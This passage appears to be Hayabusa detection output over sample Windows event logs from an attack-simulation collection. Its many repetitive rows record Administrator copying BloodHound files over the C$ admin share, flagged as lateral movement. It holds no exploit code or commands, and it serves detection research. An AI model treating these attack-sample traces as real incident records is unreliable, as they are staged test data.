Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.gexf | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.graphml | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.image | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.json | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.spreadsheet | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.svg | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.xlsx | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.helpers.graph | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.dagre | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.forceAtlas2 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.forceLink | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.fruchtermanReingold | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.noverlap | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.cypher | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.gexf | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.json | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.pathfinding.astar | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.activeState | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.animate | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.colorbrewer | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.design | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.dragNodes | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.edgeSiblings | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.filter | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.fullScreen | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.generators | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.keyboard | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.lasso | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.leaflet | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.legend | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.locate | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.neighborhoods | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.poweredBy | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.relativeSize | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.select | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.tooltips | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.customEdgeShapes | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.edgeLabels | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.glyphs | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.halo | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.898 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.linkurious | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.898 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.statistics.HITS | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.statistics.louvain | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\scripts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\captors | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\classes | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\middlewares | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\misc | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\renderers | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 